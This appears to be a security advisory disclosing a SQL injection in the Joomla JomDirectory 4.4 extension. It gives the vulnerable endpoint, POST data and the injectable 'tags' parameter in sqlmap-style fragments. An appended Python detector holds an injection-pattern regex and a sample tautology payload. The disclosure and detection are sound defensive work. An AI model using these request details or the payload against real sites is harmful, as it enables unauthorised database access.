Joomla JomDirectory 4.4 SQL Injection

2018.01.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
#Title: Joomla JomDirectory 4.4 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://comdev.eu/jomdirectory/
#URL: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/jomdirectory/
#Product: 'Joomla JomDirectory 4.4'
#Developer: Comdev
#Extension type: Plugin
#Last updated: Oct 29 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
# Description:
# Building your own business directory site is now easy and quick! Increase user experience of your business directory website with the most versatile extension
# that smoothly integrates with Joomla.
#
# --Method=POST -p [tags]
#
# -u "http://127.0.0.1/joomla/index.php?option=com_jomcomdev&task=maps.items&format=json&extension=com_jomdirectory&limit=100"
#
# --data="address-lat-lng=&distance=25&latitude=&longitude=&tags=[SQLI]&search=&categories_id=134&favorites=0&featured=0&93a3a2bbe8ed22d8e8e8584b39cc1834=1&"
# PoC:
# https://prnt.sc/hurom8
#
# Momo Martin Machi rajel Tetouani 7a9ir
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################
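A defender-side check for the request named in the advisory, added here as an example and not part of the original advisory or the extension's code: it flags POST bodies sent to the maps.items endpoint whose tags field carries SQL metacharacters. The function names, the pattern and the sample requests are constructed for illustration, and it assumes legitimate tags values are plain words or numeric ids.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate tag filter never contains quotes, statement
# separators, comment markers, parentheses or these SQL keywords.
SUSPICIOUS = re.compile(
    r"['\"`;()]|--|/\*|#|\b(?:union|select|sleep|benchmark)\b",
    re.IGNORECASE,
)

def is_target(url):
    """True when the URL addresses the endpoint named in the advisory."""
    q = parse_qs(urlsplit(url).query)
    return (q.get("option") == ["com_jomcomdev"]
            and q.get("task") == ["maps.items"]
            and q.get("extension") == ["com_jomdirectory"])

def suspicious_tags(url, body):
    """Return the decoded tags values that look like injection attempts.

    Returns [] for clean requests and for requests to other endpoints.
    parse_qs percent-decodes the body, so encoded quotes are caught too.
    """
    if not is_target(url):
        return []
    fields = parse_qs(body, keep_blank_values=True)
    return [v for v in fields.get("tags", []) if SUSPICIOUS.search(v)]

# Constructed sample requests (URL, POST body) as they might be taken
# from a reverse-proxy or WAF log that records request bodies.
ENDPOINT = ("/index.php?option=com_jomcomdev&task=maps.items"
            "&format=json&extension=com_jomdirectory&limit=100")
SAMPLES = [
    (ENDPOINT, "address-lat-lng=&distance=25&tags=12,15&categories_id=134"),
    (ENDPOINT, "distance=25&tags=12%27+OR+%271%27%3D%271&categories_id=134"),
    ("/index.php?option=com_content&view=article&id=3", "tags=x%27"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        hits = suspicious_tags(url, body)
        print("ALERT" if hits else "ok   ", hits)
```
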

